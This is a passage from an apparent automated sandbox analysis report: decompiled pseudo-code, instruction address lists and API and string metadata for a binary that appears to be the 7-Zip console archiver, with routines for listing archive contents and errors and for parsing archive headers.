												__eflags = _t786 - 0x80;
												if(_t786 >= 0x80) {
													goto L34;
												} else {
													_push( *(_t1081 - 0x14));
												}
											}
											L00407DAD(_t829);
											L00407DAD(_t829, 0x20);
											 *(_t1081 - 0x18) =  *(_t1081 - 0x18) + 1;
											__eflags =  *(_t1081 - 0x18) -  *(_t1073 + 0x30);
										} while ( *(_t1081 - 0x18) <  *(_t1073 + 0x30));
									}
									L00407CC0(_t829, 0x407ccd);
									 *(_t1081 - 4) = 8;
									E00407A18( *((intOrPtr*)(_t1081 - 0x2c)));
									 *(_t1081 - 0x1c) =  *(_t1081 - 0x1c) + 1;
									_t784 =  *(_t1081 - 0x20);
									__eflags =  *(_t1081 - 0x1c) -  *((intOrPtr*)(_t784 + 0x10));
								} while ( *(_t1081 - 0x1c) <  *((intOrPtr*)(_t784 + 0x10)));
							}
							L00407CC0(E00407CD5(L00407CC0(_t829, 0x407ccd), "Codecs:"), 0x407ccd);
							 *(_t1081 - 4) = 7;
							E00408604(_t1081 - 0x60);
							_t757 =  *(_t1081 - 0x20);
							 *(_t1081 - 4) = 4;
							__eflags = _t757;
							if(_t757 != 0) {
								 *((intOrPtr*)( *_t757 + 8))(_t757);
							}
							 *(_t1081 - 4) = 3;
							E00406E46(_t1081 - 0x7c);
							 *(_t1081 - 4) =  *(_t1081 - 4) & 0x00000000;
							E00405233(_t1081 - 0x2d8, __eflags);
							 *((intOrPtr*)(_t1081 - 0x4c)) = 0x47a420;
							 *(_t1081 - 4) = 0xa;
							_t1075 = 0;
							goto L53;
						}
					} else {
						E004051E3(0x490ab8, 1);
						 *(_t1081 - 4) = 3;
						E00406E46(_t1081 - 0x7c);
						 *(_t1081 - 4) =  *(_t1081 - 4) & 0x00000000;
						E00405233(_t1081 - 0x2d8, __eflags);
						 *((intOrPtr*)(_t1081 - 0x4c)) = 0x47a420;
						 *(_t1081 - 4) = 5;
						goto L53;
					}
				} else {
					E004051E3(0x490ab8, 1);
					 *((intOrPtr*)(_t1081 - 0x4c)) = 0x47a420;
					 *(_t1081 - 4) = 2;
					L53:
					E0040862D();
					 *(_t1081 - 4) =  *(_t1081 - 4) | 0xffffffff;
					E00408604(_t1081 - 0x4c);
					_t554 = _t1075;
					L110:
					 *[fs:0x0] =  *((intOrPtr*)(_t1081 - 0xc));
					return _t554;
				}
			}






























































                                                                      0x00403a75
                                                                      0x00403a7a
                                                                      0x00403a80
                                                                      0x00403a83
                                                                      0x00403a8c
                                                                      0x00403a96
                                                                      0x00403a99
                                                                      0x00403a9b
                                                                      0x00403aa8
                                                                      0x00403aad
                                                                      0x00403ab3
                                                                      0x00403ab7
                                                                      0x00403abc
                                                                      0x00403ac3
                                                                      0x00403acd
                                                                      0x00403af0
                                                                      0x00403afb
                                                                      0x00403b03
                                                                      0x00403b07
                                                                      0x00403b15
                                                                      0x00403b19
                                                                      0x00403b1a
                                                                      0x00403b1e
                                                                      0x00403b23
                                                                      0x00403b2a
                                                                      0x00403b62
                                                                      0x00403b69
                                                                      0x00403b6b
                                                                      0x00403b72
                                                                      0x00403b72
                                                                      0x00403b77
                                                                      0x00403b7e
                                                                      0x00403b83
                                                                      0x00403b85
                                                                      0x00403b85
                                                                      0x00403b8a
                                                                      0x00403b91
                                                                      0x00403b97
                                                                      0x00403b99
                                                                      0x00403b99
                                                                      0x00403b9d
                                                                      0x00403b9d
                                                                      0x00403bab
                                                                      0x00403bac
                                                                      0x00403bb1
                                                                      0x00403bb3
                                                                      0x00403bb9
                                                                      0x00403bbc
                                                                      0x00403bbe
                                                                      0x00403bc2
                                                                      0x00403bcf
                                                                      0x00403bcf
                                                                      0x00403bc4
                                                                      0x00403bcb
                                                                      0x00403bcb
                                                                      0x00403bd1
                                                                      0x00403bd3
                                                                      0x00403bd6
                                                                      0x00403bda
                                                                      0x00403be0
                                                                      0x00403be5
                                                                      0x00403be5
                                                                      0x00403bea
                                                                      0x00403bee
                                                                      0x00403bf3
                                                                      0x00403bf5
                                                                      0x00403bf7
                                                                      0x00403c03
                                                                      0x00403c03
                                                                      0x00403c0e
                                                                      0x00403c13
                                                                      0x00403c16
                                                                      0x00403c19
                                                                      0x00403c1b
                                                                      0x00403c1d
                                                                      0x00403c37
                                                                      0x00403c37
                                                                      0x00403c41
                                                                      0x00403c48
                                                                      0x00403c1f
                                                                      0x00403c1f
                                                                      0x00403c26
                                                                      0x00000000
                                                                      0x00403c28
                                                                      0x00403c2e
                                                                      0x00403c33
                                                                      0x00403c35
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403c35
                                                                      0x00403c26
                                                                      0x00403c1d
                                                                      0x00403c4d
                                                                      0x00403c52
                                                                      0x00403c57
                                                                      0x00403c63
                                                                      0x00403c6a
                                                                      0x00403c6b
                                                                      0x00403c6f
                                                                      0x00403c74
                                                                      0x00403c76
                                                                      0x00403c78
                                                                      0x00403c82
                                                                      0x00403c89
                                                                      0x00403c89
                                                                      0x00403c8e
                                                                      0x00403c95
                                                                      0x00403ecc
                                                                      0x00403ed3
                                                                      0x0040400d
                                                                      0x0040400d
                                                                      0x00404011
                                                                      0x00404572
                                                                      0x00404574
                                                                      0x0040457a
                                                                      0x0040457d
                                                                      0x0040457f
                                                                      0x00404583
                                                                      0x00404590
                                                                      0x00404590
                                                                      0x00404585
                                                                      0x0040458c
                                                                      0x0040458c
                                                                      0x00404592
                                                                      0x00404594
                                                                      0x00404598
                                                                      0x0040459b
                                                                      0x004045a0
                                                                      0x004045a0
                                                                      0x004045a3
                                                                      0x004045ac
                                                                      0x004045b6
                                                                      0x004045b9
                                                                      0x004045bd
                                                                      0x004045ca
                                                                      0x004045cd
                                                                      0x004045d0
                                                                      0x004045d3
                                                                      0x004045d6
                                                                      0x004045d9
                                                                      0x004045dc
                                                                      0x004045df
                                                                      0x004045e2
                                                                      0x004045f3
                                                                      0x00404600
                                                                      0x00404604
                                                                      0x0040460a
                                                                      0x00404615
                                                                      0x0040461a
                                                                      0x00404626
                                                                      0x0040462a
                                                                      0x00404630
                                                                      0x00404636
                                                                      0x0040463b
                                                                      0x00404642
                                                                      0x00404651
                                                                      0x0040465d
                                                                      0x0040466a
                                                                      0x0040467b
                                                                      0x00404687
                                                                      0x0040468d
                                                                      0x0040469e
                                                                      0x0040469f
                                                                      0x004046a7
                                                                      0x004046ac
                                                                      0x004046af
                                                                      0x004046b2
                                                                      0x004046c3
                                                                      0x004046c9
                                                                      0x004046d0
                                                                      0x004046d1
                                                                      0x004046db
                                                                      0x004046dc
                                                                      0x004046e3
                                                                      0x004046e7
                                                                      0x004046f1
                                                                      0x004046f5
                                                                      0x004046fa
                                                                      0x004046fe
                                                                      0x00404706
                                                                      0x00404708
                                                                      0x00404721
                                                                      0x00404726
                                                                      0x0040472a
                                                                      0x0040472c
                                                                      0x0040472c
                                                                      0x0040472a
                                                                      0x00404736
                                                                      0x0040473b
                                                                      0x0040473e
                                                                      0x00404741
                                                                      0x00404743
                                                                      0x0040474a
                                                                      0x00404762
                                                                      0x00404745
                                                                      0x00404745
                                                                      0x00404748
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404748
                                                                      0x0040476a
                                                                      0x0040476d
                                                                      0x004048d7
                                                                      0x004048d7
                                                                      0x004048db
                                                                      0x004048e3
                                                                      0x004048e6
                                                                      0x004048eb
                                                                      0x004048ee
                                                                      0x004048f3
                                                                      0x004048f5
                                                                      0x0040490f
                                                                      0x0040490f
                                                                      0x00404914
                                                                      0x00404917
                                                                      0x0040491c
                                                                      0x0040491e
                                                                      0x00404938
                                                                      0x00404938
                                                                      0x004048dd
                                                                      0x004048dd
                                                                      0x004048e1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004048e1
                                                                      0x0040493d
                                                                      0x00404941
                                                                      0x0040494b
                                                                      0x00404952
                                                                      0x00404952
                                                                      0x0040495a
                                                                      0x00404960
                                                                      0x0040496a
                                                                      0x00404975
                                                                      0x0040497a
                                                                      0x0040497d
                                                                      0x00404981
                                                                      0x00404986
                                                                      0x00404986
                                                                      0x0040498c
                                                                      0x00404990
                                                                      0x00404995
                                                                      0x00404998
                                                                      0x0040499c
                                                                      0x0040499e
                                                                      0x004049a3
                                                                      0x004049a3
                                                                      0x004049a9
                                                                      0x004049ad
                                                                      0x004049b2
                                                                      0x004049bc
                                                                      0x004049c1
                                                                      0x004049c8
                                                                      0x00000000
                                                                      0x00404773
                                                                      0x00404776
                                                                      0x00404779
                                                                      0x00000000
                                                                      0x0040477f
                                                                      0x0040477f
                                                                      0x00404783
                                                                      0x0040478d
                                                                      0x00404794
                                                                      0x00404794
                                                                      0x00404799
                                                                      0x004047a1
                                                                      0x004047a7
                                                                      0x004047bf
                                                                      0x004047c6
                                                                      0x004047cb
                                                                      0x004047cb
                                                                      0x004047d1
                                                                      0x004047d8
                                                                      0x004047eb
                                                                      0x00404806
                                                                      0x0040480d
                                                                      0x004047da
                                                                      0x004047da
                                                                      0x004047e1
                                                                      0x00000000
                                                                      0x004047e3
                                                                      0x004047e3
                                                                      0x004047e9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004047e9
                                                                      0x004047e1
                                                                      0x0040483f
                                                                      0x00404854
                                                                      0x0040485b
                                                                      0x00404860
                                                                      0x00404867
                                                                      0x00404875
                                                                      0x00404897
                                                                      0x00404897
                                                                      0x0040489f
                                                                      0x004048a5
                                                                      0x004048af
                                                                      0x004048ba
                                                                      0x004048bf
                                                                      0x004048c2
                                                                      0x004048c6
                                                                      0x004048cf
                                                                      0x004048cf
                                                                      0x00000000
                                                                      0x004048c6
                                                                      0x00404779
                                                                      0x00000000
                                                                      0x00404017
                                                                      0x00404017
                                                                      0x0040401e
                                                                      0x004049dd
                                                                      0x004049e4
                                                                      0x004049eb
                                                                      0x004049ec
                                                                      0x004049ef
                                                                      0x004049f5
                                                                      0x004049fd
                                                                      0x00404a06
                                                                      0x00404a08
                                                                      0x00404a0f
                                                                      0x00404a16
                                                                      0x00404a17
                                                                      0x00404a1d
                                                                      0x00404a22
                                                                      0x00404a25
                                                                      0x00404a30
                                                                      0x00404a53
                                                                      0x00404a5b
                                                                      0x00404a5f
                                                                      0x00404a64
                                                                      0x00404a66
                                                                      0x00404a6a
                                                                      0x00404a6f
                                                                      0x00404a6f
                                                                      0x00404a75
                                                                      0x00404a79
                                                                      0x00404a7e
                                                                      0x00404a7e
                                                                      0x00404a7e
                                                                      0x00404a88
                                                                      0x00404a8d
                                                                      0x00404a94
                                                                      0x00000000
                                                                      0x00404a27
                                                                      0x00404a27
                                                                      0x00404a2a
                                                                      0x00404ab7
                                                                      0x00404ab9
                                                                      0x00000000
                                                                      0x00404abf
                                                                      0x00404abf
                                                                      0x00404acb
                                                                      0x00404ad0
                                                                      0x00404ad2
                                                                      0x00404ad4
                                                                      0x00404ad7
                                                                      0x00404ada
                                                                      0x00404ae1
                                                                      0x00404ae4
                                                                      0x00404aea
                                                                      0x00404aea
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404a2a
                                                                      0x00404024
                                                                      0x0040402a
                                                                      0x0040402f
                                                                      0x00404031
                                                                      0x00404502
                                                                      0x00000000
                                                                      0x00404037
                                                                      0x00404037
                                                                      0x0040403e
                                                                      0x00404040
                                                                      0x00404046
                                                                      0x00404054
                                                                      0x00404054
                                                                      0x00404046
                                                                      0x0040405f
                                                                      0x00404064
                                                                      0x0040406b
                                                                      0x0040406f
                                                                      0x00404075
                                                                      0x00404085
                                                                      0x00404085
                                                                      0x00404085
                                                                      0x00404085
                                                                      0x00404077
                                                                      0x00404077
                                                                      0x0040407d
                                                                      0x00000000
                                                                      0x0040407f
                                                                      0x0040407f
                                                                      0x0040407f
                                                                      0x0040407d
                                                                      0x00404092
                                                                      0x0040409f
                                                                      0x004040aa
                                                                      0x004040b5
                                                                      0x004040bc
                                                                      0x004040c5
                                                                      0x004040c9
                                                                      0x004040cf
                                                                      0x004040e2
                                                                      0x004040e2
                                                                      0x004040e2
                                                                      0x004040e2
                                                                      0x004040d1
                                                                      0x004040d1
                                                                      0x004040d7
                                                                      0x00000000
                                                                      0x004040d9
                                                                      0x004040d9
                                                                      0x004040d9
                                                                      0x004040d7
                                                                      0x004040f6
                                                                      0x00404108
                                                                      0x0040410e
                                                                      0x00404119
                                                                      0x0040412a
                                                                      0x0040412e
                                                                      0x0040412f
                                                                      0x00404130
                                                                      0x00404134
                                                                      0x00404139
                                                                      0x0040413b
                                                                      0x0040413d
                                                                      0x00404147
                                                                      0x0040414e
                                                                      0x0040414e
                                                                      0x00404159
                                                                      0x0040415f
                                                                      0x00404166
                                                                      0x0040416d
                                                                      0x00404174
                                                                      0x00404177
                                                                      0x0040417c
                                                                      0x00404180
                                                                      0x00404187
                                                                      0x0040418a
                                                                      0x0040418f
                                                                      0x00404198
                                                                      0x004041b4
                                                                      0x004041b9
                                                                      0x004041bf
                                                                      0x004041c1
                                                                      0x004041c3
                                                                      0x004041c6
                                                                      0x004041c8
                                                                      0x004041ce
                                                                      0x004041e2
                                                                      0x004041f0
                                                                      0x004041f3
                                                                      0x004041fa
                                                                      0x004041fe
                                                                      0x00404209
                                                                      0x0040420e
                                                                      0x00404215
                                                                      0x0040421a
                                                                      0x0040421c
                                                                      0x0040421c
                                                                      0x004041c8
                                                                      0x00404230
                                                                      0x00404252
                                                                      0x00404259
                                                                      0x0040425a
                                                                      0x0040425d
                                                                      0x00404266
                                                                      0x00404266
                                                                      0x0040426e
                                                                      0x00404273
                                                                      0x00404276
                                                                      0x00404276
                                                                      0x00404279
                                                                      0x0040427d
                                                                      0x00404283
                                                                      0x0040428a
                                                                      0x0040428d
                                                                      0x00404290
                                                                      0x00404293
                                                                      0x00404298
                                                                      0x0040429e
                                                                      0x004042a2
                                                                      0x004042a7
                                                                      0x004042b3
                                                                      0x004042bc
                                                                      0x004042bc
                                                                      0x004042c1
                                                                      0x004042c7
                                                                      0x004042d3
                                                                      0x004042dc
                                                                      0x004042dc
                                                                      0x004042e1
                                                                      0x004042e7
                                                                      0x004042f3
                                                                      0x004042fc
                                                                      0x004042fc
                                                                      0x00404301
                                                                      0x00404307
                                                                      0x00404309
                                                                      0x0040430e
                                                                      0x00404317
                                                                      0x0040431b
                                                                      0x00404320
                                                                      0x00404327
                                                                      0x00404331
                                                                      0x00404331
                                                                      0x00404336
                                                                      0x00404339
                                                                      0x0040433b
                                                                      0x00404340
                                                                      0x0040434c
                                                                      0x0040434c
                                                                      0x00404360
                                                                      0x00404360
                                                                      0x00404365
                                                                      0x0040436b
                                                                      0x0040436d
                                                                      0x00404370
                                                                      0x0040439b
                                                                      0x004043b7
                                                                      0x004043bc
                                                                      0x004043be
                                                                      0x004043c1
                                                                      0x004043c3
                                                                      0x004043c9
                                                                      0x004043dd
                                                                      0x004043ee
                                                                      0x004043f1
                                                                      0x004043f8
                                                                      0x004043fc
                                                                      0x00404407
                                                                      0x0040440c
                                                                      0x00404416
                                                                      0x0040441b
                                                                      0x0040441d
                                                                      0x0040441d
                                                                      0x004043c3
                                                                      0x00404431
                                                                      0x00404453
                                                                      0x0040445a
                                                                      0x0040445b
                                                                      0x0040445e
                                                                      0x00404467
                                                                      0x00404467
                                                                      0x0040446f
                                                                      0x00404474
                                                                      0x00404477
                                                                      0x00404372
                                                                      0x00404372
                                                                      0x00404378
                                                                      0x0040438e
                                                                      0x0040438e
                                                                      0x00404378
                                                                      0x00404480
                                                                      0x00404484
                                                                      0x0040448f
                                                                      0x00404493
                                                                      0x0040449e
                                                                      0x004044a4
                                                                      0x004044ab
                                                                      0x004044b0
                                                                      0x004044b2
                                                                      0x004044b6
                                                                      0x004044bb
                                                                      0x004044bb
                                                                      0x004044c1
                                                                      0x004044c5
                                                                      0x004044ca
                                                                      0x004044d4
                                                                      0x004044d9
                                                                      0x004044e3
                                                                      0x004044ea
                                                                      0x004044ef
                                                                      0x004044f6
                                                                      0x004044fb
                                                                      0x004044fb
                                                                      0x00000000
                                                                      0x00404031
                                                                      0x0040401e
                                                                      0x00403ed9
                                                                      0x00403ee4
                                                                      0x00403ee9
                                                                      0x00403ee9
                                                                      0x00403eec
                                                                      0x00403ef2
                                                                      0x00403ef8
                                                                      0x00403efa
                                                                      0x00403f00
                                                                      0x00403f96
                                                                      0x00403f96
                                                                      0x00403f9b
                                                                      0x00403f9d
                                                                      0x00000000
                                                                      0x00403fa3
                                                                      0x00403fa3
                                                                      0x00403fa6
                                                                      0x00403ffc
                                                                      0x00404008
                                                                      0x00000000
                                                                      0x00403fa8
                                                                      0x00403faf
                                                                      0x00403fb7
                                                                      0x00403fbb
                                                                      0x00403fc0
                                                                      0x00403fc2
                                                                      0x00403fc6
                                                                      0x00403fcb
                                                                      0x00403fcb
                                                                      0x00403fd1
                                                                      0x00403fd5
                                                                      0x00403fda
                                                                      0x00403fe4
                                                                      0x00403fe9
                                                                      0x00403ff0
                                                                      0x00404a9b
                                                                      0x00404a9e
                                                                      0x00404aa3
                                                                      0x00404aaa
                                                                      0x00404ab1
                                                                      0x00000000
                                                                      0x00404ab1
                                                                      0x00403fa6
                                                                      0x00403f06
                                                                      0x00403f06
                                                                      0x00403f0b
                                                                      0x00403f0d
                                                                      0x00404507
                                                                      0x0040450a
                                                                      0x0040450e
                                                                      0x00404513
                                                                      0x00404516
                                                                      0x0040451a
                                                                      0x0040451c
                                                                      0x00404521
                                                                      0x00404521
                                                                      0x00404527
                                                                      0x0040452b
                                                                      0x00404530
                                                                      0x0040453a
                                                                      0x0040453f
                                                                      0x00404549
                                                                      0x00404550
                                                                      0x00404555
                                                                      0x0040455c
                                                                      0x00404561
                                                                      0x00404561
                                                                      0x00000000
                                                                      0x00403f13
                                                                      0x00403f13
                                                                      0x00403f16
                                                                      0x00403f85
                                                                      0x00403f91
                                                                      0x00000000
                                                                      0x00403f18
                                                                      0x00403f1f
                                                                      0x00403f27
                                                                      0x00403f2b
                                                                      0x00403f30
                                                                      0x00403f32
                                                                      0x00403f36
                                                                      0x00403f3b
                                                                      0x00403f3b
                                                                      0x00403f41
                                                                      0x00403f45
                                                                      0x00403f4a
                                                                      0x00403f4a
                                                                      0x00403f4a
                                                                      0x00403f54
                                                                      0x00403f59
                                                                      0x00403f62
                                                                      0x00403f69
                                                                      0x00000000
                                                                      0x00403f69
                                                                      0x00403f16
                                                                      0x00403f0d
                                                                      0x00403f00
                                                                      0x00403c9b
                                                                      0x00403cb7
                                                                      0x00403cbf
                                                                      0x00403cc3
                                                                      0x00403cc5
                                                                      0x00403ccb
                                                                      0x00403cd9
                                                                      0x00403cde
                                                                      0x00403ce7
                                                                      0x00403cec
                                                                      0x00403cfc
                                                                      0x00403d01
                                                                      0x00403d12
                                                                      0x00403d1e
                                                                      0x00403d23
                                                                      0x00403d2a
                                                                      0x00403d36
                                                                      0x00403d42
                                                                      0x00403d45
                                                                      0x00403d48
                                                                      0x00403d4b
                                                                      0x00403d50
                                                                      0x00403d54
                                                                      0x00403d58
                                                                      0x00403d5c
                                                                      0x00403d5e
                                                                      0x00403d6b
                                                                      0x00403d6e
                                                                      0x00403d76
                                                                      0x00403d7a
                                                                      0x00403d84
                                                                      0x00403d8f
                                                                      0x00403d93
                                                                      0x00403d9d
                                                                      0x00403d9d
                                                                      0x00403da7
                                                                      0x00403dac
                                                                      0x00403db2
                                                                      0x00403db2
                                                                      0x00403d5e
                                                                      0x00403dbe
                                                                      0x00403dca
                                                                      0x00403dcf
                                                                      0x00403dd3
                                                                      0x00403dd7
                                                                      0x00403dd9
                                                                      0x00403ddf
                                                                      0x00403de2
                                                                      0x00403de4
                                                                      0x00403de7
                                                                      0x00403df2
                                                                      0x00403df2
                                                                      0x00403df5
                                                                      0x00403df7
                                                                      0x00403dfa
                                                                      0x00403e01
                                                                      0x00403e01
                                                                      0x00403dfc
                                                                      0x00403dfc
                                                                      0x00403dfc
                                                                      0x00403e07
                                                                      0x00403e0f
                                                                      0x00403e11
                                                                      0x00403e13
                                                                      0x00403e16
                                                                      0x00403e1d
                                                                      0x00403e1d
                                                                      0x00403e18
                                                                      0x00403e18
                                                                      0x00403e18
                                                                      0x00403e20
                                                                      0x00403de9
                                                                      0x00403de9
                                                                      0x00403deb
                                                                      0x00000000
                                                                      0x00403ded
                                                                      0x00403ded
                                                                      0x00403ded
                                                                      0x00403deb
                                                                      0x00403e23
                                                                      0x00403e2c
                                                                      0x00403e31
                                                                      0x00403e37
                                                                      0x00403e37
                                                                      0x00403dd9
                                                                      0x00403e3f
                                                                      0x00403e44
                                                                      0x00403e4b
                                                                      0x00403e50
                                                                      0x00403e53
                                                                      0x00403e5a
                                                                      0x00403e5a
                                                                      0x00403ccb
                                                                      0x00403e7a
                                                                      0x00403e82
                                                                      0x00403e86
                                                                      0x00403e8b
                                                                      0x00403e8e
                                                                      0x00403e92
                                                                      0x00403e94
                                                                      0x00403e99
                                                                      0x00403e99
                                                                      0x00403e9f
                                                                      0x00403ea3
                                                                      0x00403ea8
                                                                      0x00403eb2
                                                                      0x00403eb7
                                                                      0x00403ebe
                                                                      0x00403ec5
                                                                      0x00000000
                                                                      0x00403ec5
                                                                      0x00403b2c
                                                                      0x00403b33
                                                                      0x00403b3b
                                                                      0x00403b3f
                                                                      0x00403b44
                                                                      0x00403b4e
                                                                      0x00403b53
                                                                      0x00403b56
                                                                      0x00000000
                                                                      0x00403b56
                                                                      0x00403acf
                                                                      0x00403ad6
                                                                      0x00403adb
                                                                      0x00403ade
                                                                      0x00403f6a
                                                                      0x00403f6d
                                                                      0x00403f72
                                                                      0x00403f79
                                                                      0x00403f7e
                                                                      0x00404563
                                                                      0x00404569
                                                                      0x00404571
                                                                      0x00404571

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00403A75
                                                                      • SetFileApisToOEM.KERNEL32 ref: 00403A83
                                                                      • GetCommandLineW.KERNEL32 ref: 00403A9E
                                                                        • Part of subcall function 00406C53: __EH_prolog.LIBCMT ref: 00406C58
                                                                        • Part of subcall function 0046B8F4: RaiseException.KERNEL32(0047CF70,?,00405CA1,?,?,?,0047CF70,?,?,?,00405CA1), ref: 0046B922
                                                                        • Part of subcall function 00407CEC: __EH_prolog.LIBCMT ref: 00407CF1
                                                                        • Part of subcall function 00404B09: __EH_prolog.LIBCMT ref: 00404B0E
                                                                        • Part of subcall function 00405233: __EH_prolog.LIBCMT ref: 00405238
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog$ApisCommandExceptionFileLineRaise
                                                                      • String ID: CRC Error$Decoding Error$Error:$ : $ file$----------------$59@$Archive Errors: $Archives: $CRC$CRC: $Codecs:$Compressed: $Error: $Errors: $Files: $Folders: $Formats:$Size: $Sub items Errors: $WARNING: Cannot find $WARNING: Cannot open $WARNINGS for files:
                                                                      • API String ID: 3088770371-3134536549
                                                                      • Opcode ID: 111baba5f42da8ba9aa8a8c19e39f95d8ac119f90839705df92361c15f00354f
                                                                      • Instruction ID: 0e9785898952d904cddb7e6f0fb348193d980c7c6074724112ac217821b8bdc4
                                                                      • Opcode Fuzzy Hash: 111baba5f42da8ba9aa8a8c19e39f95d8ac119f90839705df92361c15f00354f
                                                                      • Instruction Fuzzy Hash: F0A28D70E042199ADF14EBA5C855BEEBBB4AF54308F1044BFE105B72C2DB785E84CB5A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00417BAE Relevance: 23.5, APIs: 1, Strings: 12, Instructions: 710COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 96%
                                                                      			E00417BAE(intOrPtr __ecx) {
				intOrPtr* _t349;
				signed int _t353;
				intOrPtr _t355;
				void* _t356;
				signed int _t358;
				signed int _t359;
				signed int _t364;
				signed int _t371;
				signed int _t375;
				signed int _t377;
				signed int _t378;
				signed int _t384;
				signed int _t385;
				signed int _t391;
				void* _t393;
				signed int _t396;
				void* _t402;
				char* _t407;
				signed int _t409;
				signed int _t411;
				signed int _t414;
				signed int _t426;
				intOrPtr* _t428;
				void* _t433;
				void* _t437;
				signed int _t440;
				signed int _t441;
				signed int _t449;
				intOrPtr _t457;
				signed int _t462;
				intOrPtr _t463;
				intOrPtr _t465;
				void* _t472;
				intOrPtr _t479;
				signed int _t484;
				signed int _t486;
				void* _t489;
				signed int _t495;
				signed int _t496;
				intOrPtr _t498;
				signed int _t499;
				signed int _t500;
				char* _t502;
				intOrPtr _t536;
				signed int _t555;
				signed int _t556;
				signed int _t559;
				signed int _t582;
				void* _t587;
				intOrPtr _t591;
				signed int _t594;
				intOrPtr _t607;
				signed int _t619;
				signed int _t627;
				signed int _t629;
				char* _t641;
				signed char* _t645;
				intOrPtr _t647;
				signed int _t650;
				signed int _t652;
				intOrPtr _t653;
				void* _t657;
				void* _t659;
				intOrPtr _t660;
				signed int _t663;
				signed int _t666;
				void* _t667;
				void* _t669;
				intOrPtr* _t670;

				E0046B890(E00474DC3, _t667);
				_t670 = _t669 - 0x17c;
				_t647 = __ecx;
				_t641 = 0;
				 *((intOrPtr*)(_t667 - 0x74)) = __ecx;
				_t349 =  *((intOrPtr*)(__ecx));
				if(_t349 != 0) {
					 *((intOrPtr*)( *_t349 + 8))(_t349);
					 *((intOrPtr*)(__ecx)) = 0;
				}
				 *(_t647 + 0x34) = _t641;
				 *( *(_t647 + 0x30)) = _t641;
				E00408963(_t647 + 4);
				 *(_t667 - 4) = _t641;
				 *(_t667 - 0x48) = _t641;
				 *(_t667 - 0x44) = _t641;
				 *(_t667 - 0x40) = _t641;
				E00401E9A(_t667 - 0x48, 3);
				_t353 =  *(_t667 - 0x68);
				 *(_t667 - 4) = 1;
				if(_t353 == _t641) {
					L11:
					E00404AD0(_t667 - 0x34, 4);
					 *((intOrPtr*)(_t667 - 0x34)) = 0x47a668;
					__eflags =  *(_t667 + 0xc) - _t641;
					 *(_t667 - 4) = 3;
					if( *(_t667 + 0xc) < _t641) {
						_t355 =  *((intOrPtr*)(_t667 + 8));
						_t495 = 0;
						 *(_t667 + 0xc) = _t641;
						__eflags =  *((intOrPtr*)(_t355 + 0x10)) - _t641;
						if( *((intOrPtr*)(_t355 + 0x10)) <= _t641) {
							L18:
							__eflags =  *(_t667 + 0x10) - _t641;
							if( *(_t667 + 0x10) != _t641) {
								L21:
								__eflags =  *((intOrPtr*)(_t667 - 0x2c)) - 2;
								if( *((intOrPtr*)(_t667 - 0x2c)) < 2) {
									L64:
									_t356 = E00408053( *(_t667 - 0x48), L"000");
									__eflags = _t356 - _t641;
									if(_t356 == _t641) {
										L66:
										 *(_t667 - 0x14) = _t641;
										 *(_t667 - 0x10) = _t641;
										 *((intOrPtr*)(_t667 - 0x18)) = 0x47a7ec;
										 *(_t667 - 4) = 7;
										E0040FA26(_t667 - 0x18, 0x400);
										_t358 =  *(_t667 + 0x10);
										_t496 =  *(_t667 - 0x10);
										_t359 =  *((intOrPtr*)( *_t358 + 0x10))(_t358, _t641, _t641, _t641, _t641);
										__eflags = _t359 - _t641;
										if(_t359 != _t641) {
											L68:
											_t650 = _t359;
											 *((intOrPtr*)(_t667 - 0x18)) = 0x47a7ec;
											E00407A18( *(_t667 - 0x10));
											L127:
											 *(_t667 - 4) = 1;
											E00408604(_t667 - 0x34);
											E00407A18( *(_t667 - 0x48));
											E00407A18( *((intOrPtr*)(_t667 - 0x6c)));
											_t364 = _t650;
											L33:
											 *[fs:0x0] =  *((intOrPtr*)(_t667 - 0xc));
											return _t364;
										}
										 *(_t667 + 0xc) = 0x400;
										_t359 = E0040FA74( *(_t667 + 0x10), _t496, _t667 + 0xc);
										__eflags = _t359 - _t641;
										if(_t359 == _t641) {
											__eflags =  *(_t667 + 0xc) - 0x10;
											if( *(_t667 + 0xc) < 0x10) {
												L80:
												 *(_t667 - 4) = 3;
												 *((intOrPtr*)(_t667 - 0x18)) = 0x47a7ec;
												E00407A18( *(_t667 - 0x10));
												L81:
												__eflags =  *((intOrPtr*)(_t667 - 0x2c)) - 2;
												if( *((intOrPtr*)(_t667 - 0x2c)) < 2) {
													L92:
													__eflags =  *((intOrPtr*)(_t667 - 0x2c)) - _t641;
													 *(_t667 - 0x20) = _t641;
													if( *((intOrPtr*)(_t667 - 0x2c)) <= _t641) {
														L32:
														 *(_t667 - 4) = 1;
														E00408604(_t667 - 0x34);
														E00407A18( *(_t667 - 0x48));
														E00407A18( *((intOrPtr*)(_t667 - 0x6c)));
														_t364 = 1;
														goto L33;
													}
													_t498 =  *((intOrPtr*)(_t667 - 0x74));
													__eflags = 0;
													do {
														_t652 =  *(_t667 + 0x10);
														__eflags = _t652;
														if(_t652 == 0) {
															L96:
															 *(_t667 + 0xc) = 0;
